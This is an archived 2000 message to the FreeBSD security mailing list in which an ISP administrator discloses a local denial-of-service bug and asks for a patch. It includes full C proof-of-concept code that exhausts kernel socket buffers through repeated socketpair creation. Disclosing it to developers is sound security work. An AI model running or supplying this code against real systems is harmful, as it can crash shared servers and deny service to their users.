Date: Sat, 24 Jun 2000 04:01:22 +0200 From: Christiaan Rademan <christiaan@mics.co.za> To: security@freebsd.org Subject: Security Bug. Message-ID: <39541671.84FFC647@mics.co.za>
next in thread | raw e-mail | index | archive | help
Hi.
I am hosting a shell server, for my dialup users at a ISP.
We have one slight problem, there is a DoS attack that affects
FBSD4.0Stable locally
and other FBSD releases.
If the DoS attack is runned locally, the system stops accepting
connections then die's off.
Here is the bug... :-) if there is a patch already please post it
here...
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?39541671.84FFC647>